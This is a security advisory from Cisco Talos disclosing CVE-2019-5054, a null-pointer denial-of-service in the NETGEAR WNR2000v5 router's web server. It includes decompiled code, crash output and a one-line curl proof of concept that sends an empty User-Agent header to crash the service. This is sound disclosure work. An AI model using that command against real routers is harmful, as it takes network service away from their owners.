Talos Vulnerability Report

TALOS-2019-0831

NETGEAR N300 WNR2000v5 unauthenticated HTTP denial-of-service vulnerability

September 9, 2019
CVE Number

CVE-2019-5054

Summary

An exploitable denial-of-service vulnerability exists in the session handling functionality of the NETGEAR N300 (WNR2000v5) HTTP server. An HTTP request with an empty User-Agent string sent to a page requiring authentication can cause a null pointer dereference, resulting in the HTTP service crashing. An unauthenticated attacker can send a specially crafted HTTP request to trigger this vulnerability.

Tested Versions

NETGEAR N300 WNR2000v5 Firmware Version V1.0.0.70

Product URLs

https://www.netgear.com/support/product/WNR2000v5

CVSSv3 Score

 7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-730:  Denial of Service

Details

The NETGEAR n300 is a small, affordable wireless router with minimal features.

Each HTTP request made to the HTTP daemon populates the following structure located at the hard-coded address 0x4cabb0:

struct http_request {

  char method[8];
  float version;
  char url[256];
  char headerbuf[4096];
  char *authorization;
  char *host;
  char *accept;
  char *accept_charset;
  char *accept_encoding;
  char *accept_language;
  char *connection;
  char *cookie;
  char *referer;
  char *user_agent;
  char *content_type;
  char *content_length;
  char *soapaction;

}

When attempting to connect to a page that requires authentication, the function doauthcheck() calls another function called sendauthenticate(). This function contains a section of code that concatenates the received User-Agent to the end of the client IP address (after it is converted to a string). This string is then supposed to be compared against the contents of the file "/tmp/AUTHlogin_browser" which should contain the IP Address and User-Agent of the previously authenticated client.

The problem is when req->userAgent doesn't get populated — there isn't a check against this. This results in a NULL pointer dereference and crashes the service:

agent = sa_straddr(&peeraddr); // Convert binary IP address to a string at 0x4b1c98
strcpy(curBrowser,agent);      // Copy string
strcat(curBrowser,req.user_agent); // Append req->user_agent to IP address

[Annotated Disassembly / Decompilation output]

0x4097f8 <send_authenticate+412>:   lw  a1,4400(s5)   // req->user_agent
0x4097fc <send_authenticate+416>:   lw  t9,-31484(gp) // load address of strcat()
0x409800 <send_authenticate+420>:   jalr    t9          // crash @ call strcat(curBrowser, agent)
0x409804 <send_authenticate+424>:   move    a0,s0       // client IP address string

Crash Information

   0x2ab59f88:  bnez    v0,0x2ab59f84
   0x2ab59f8c:  addiu   v1,v1,1
   0x2ab59f90:  addiu   v1,v1,-2
=> 0x2ab59f94:  lb  v0,0(a1)        // $a1 == 0x00
   0x2ab59f98:  addiu   v1,v1,1
   0x2ab59f9c:  addiu   a1,a1,1
   0x2ab59fa0:  bnez    v0,0x2ab59f94
   0x2ab59fa4:  sb  v0,0(v1)

Stopped reason: SIGSEGV
0x2ab59f94 in ?? ()

peda-mips > x/32xw $a1
0x0:    Cannot access memory at address 0x0

Exploit Proof of Concept

$ curl -H 'User-Agent:' http://192.168.1.1/UPG_upgrade.htm

Timeline

2019-05-08 - Vendor Disclosure
2019-09-09- Public Release

Credit

Discovered by Dave McDaniel of Cisco Talos.